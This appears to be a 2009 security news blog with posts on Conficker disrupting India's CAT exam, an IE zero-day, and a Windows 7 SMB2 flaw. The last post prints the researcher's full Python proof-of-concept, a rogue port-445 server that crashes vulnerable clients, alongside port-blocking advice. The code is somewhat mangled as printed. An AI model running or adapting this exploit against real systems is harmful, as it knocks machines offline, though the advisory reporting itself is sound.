Monday, 30 November 2009

Conficker attacks major Indian admission test

According to some major reports  the conficker attack caused a huge chaos and resulted in cancelling India's major MBA admission test CAT (Common Admission Test).
The computers are said to have been infected with Conficker and
W32/Nimda viruses.

The test centers were shut because of infection and it caused huge disruptions to number of students attending tests. This event clearly shows lack of cyber security awareness on the IT team . Since Conficker exploits MS08-067, it clearly shows the affected systems were not updated with latest Microsoft patches.
This incident is a clear example of how ignoring cyber security can affect established infrastructures.

Monday, 23 November 2009

IE 7 "getElementsByTagName()" Vulnerability

Symantec have confirmed IE zero day exploit for versions 6&7. This attack can be used to compromise the vulnerable system. The issue is in  Microsoft HTML Viewer (mshtml.dll) when trying to retrieve certain CSS could crash the browser or execute some random shell code to give system access to the attacker.



The exploit code can be found here . The workaround for this vulnerability is to update your Microsoft Internet explorer to version 8 or follow this mitigation technique

Sunday, 15 November 2009

Zero day Vulnerability in Windows 7

Its not a very long time since Windows 7 Operating system is released, we already have a Microsoft confirmed zero day vulnerability.
This was first reported by a security researcher. The bug is in SMB (Server Message Block) protocol used for network file and print sharing services. When exploited the vulnerability can result in total lock down of the system and  requires a restart to gain a total control of the system.
Laurent Gaffie the researcher who discovered this flaw says that the exploit can be successfully launched from a compromised computer within a network or using internet explorer by building a rogue packet.

The full proof of concept exploit code is published in Full Disclosure.
***********************************************************************************
#Author: Laurent GaffiƩ
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):

        print "Who:", self.client_address
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port
445
launch.serve_forever()
 *************************************************************************************
Microsoft are yet to provide patch for this, so all users are recommended to block their TCP ports 445 and 139 unless it is really necessary.
Only Windows 7 and Windows server 2008 operating systems are affected by this.